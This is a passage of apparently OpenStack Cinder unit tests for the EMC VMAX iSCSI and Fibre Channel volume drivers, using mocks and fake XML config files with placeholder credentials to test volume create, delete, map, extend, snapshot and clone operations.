def test_map_no_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_last_volume_success(
self, mock_volume_type,
mock_storage_system, mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_no_fast_success(
self, _mock_volume_type, mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_no_fast_failed(
self, _mock_volume_type, _mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
def test_create_volume_from_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_no_fast_success(self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
def test_create_clone_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
def test_migrate_volume_no_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
def test_retype_volume_no_fast_success(
self, _mock_volume_type, mock_values):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def test_check_for_setup_error(self):
self.driver.configuration.iscsi_ip_address = '1.1.1.1'
self.driver.check_for_setup_error()
self.driver.configuration.iscsi_ip_address = None
self.assertRaises(exception.InvalidInput,
self.driver.check_for_setup_error)
def _cleanup(self):
bExists = os.path.exists(self.config_file_path)
if bExists:
os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
class EMCVMAXISCSIDriverFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXISCSIDriverFastTestCase, self).setUp()
self.config_file_path = None
self.create_fake_config_file_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.cinder_emc_config_file = self.config_file_path
configuration.safe_get.return_value = 'ISCSIFAST'
configuration.config_group = 'ISCSIFAST'
self.stubs.Set(EMCVMAXISCSIDriver, 'smis_do_iscsi_discovery',
self.fake_do_iscsi_discovery)
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXISCSIDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
def create_fake_config_file_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
array = doc.createElement("Array")
arraytext = doc.createTextNode("1234567891011")
emc.appendChild(array)
array.appendChild(arraytext)
fastPolicy = doc.createElement("FastPolicy")
fastPolicyText = doc.createTextNode("GOLD1")
emc.appendChild(fastPolicy)
fastPolicy.appendChild(fastPolicyText)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
filename = 'cinder_emc_config_ISCSIFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
f = open(self.config_file_path, 'w')
doc.writexml(f)
f.close()
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_do_iscsi_discovery(self, volume):
output = []
item = '10.10.0.50: 3260,1 iqn.1992-04.com.emc: 50000973f006dd80'
output.append(item)
return output
def fake_sleep(self, seconds):
return
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=True)
@mock.patch.object(
EMCVMAXFast,
'get_tier_policy_by_name',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'get_capacities_associated_to_policy',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_fast(self, mock_storage_system,
mock_is_fast_enabled,
mock_get_policy, mock_capacity, mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_striped_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_delete_volume_fast_success(
self, _mock_volume_type, mock_storage_group):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_delete_volume_fast_notfound(
self, _mock_volume_type, mock_wrapper):
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_delete_volume_fast_failed(
self, _mock_volume_type, _mock_storage_group,
mock_storage_system, mock_policy_pool):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_last_volume_success(
self, mock_volume_type,
mock_storage_system, mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_fast_success(
self, _mock_volume_type, mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_fast_failed(
self, _mock_volume_type, _mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_snapshot_fast_success(
self, mock_volume_type, mock_storage_group, mock_volume,
mock_sync_sv, mock_storage_config_service, mock_controller_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_volume_from_snapshot_fast_success(
self, mock_volume_type, mock_storage_group, mock_volume,
mock_sync_sv, mock_storage_config_service, mock_controller_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_replication_service',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_fast_failed(
self, mock_volume_type,
mock_rep_service, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_clone_fast_success(self, mock_volume_type,
mock_storage_group, mock_volume,
mock_sync_sv,
mock_storage_config_service,
mock_controller_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_fast_failed(self, mock_volume_type,
mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
def test_migrate_volume_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_retype_volume_fast_success(
self, _mock_volume_type, mock_values, mock_wrap):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def _cleanup(self):
bExists = os.path.exists(self.config_file_path)
if bExists:
os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
class EMCVMAXFCDriverNoFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXFCDriverNoFastTestCase, self).setUp()
self.config_file_path = None
self.create_fake_config_file_no_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.cinder_emc_config_file = self.config_file_path
configuration.safe_get.return_value = 'FCNoFAST'
configuration.config_group = 'FCNoFAST'
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXFCDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
def create_fake_config_file_no_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
array = doc.createElement("Array")
arraytext = doc.createTextNode("1234567891011")
emc.appendChild(array)
array.appendChild(arraytext)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
filename = 'cinder_emc_config_FCNoFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
f = open(self.config_file_path, 'w')
doc.writexml(f)
f.close()
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_sleep(self, seconds):
return
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=False)
@mock.patch.object(
EMCVMAXUtils,
'get_pool_capacities',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_no_fast(self,
mock_storage_system,
mock_is_fast_enabled,
mock_capacity,
mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_striped_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_no_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
def test_delete_volume_no_fast_notfound(self, _mock_volume_type):
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_failed(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_last_volume_success(self, mock_volume_type,
mock_storage_system,
mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_no_fast_success(self, _mock_volume_type,
_mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_no_fast_failed(
self, _mock_volume_type, _mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
def test_create_volume_from_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_no_fast_success(self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
def test_create_clone_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
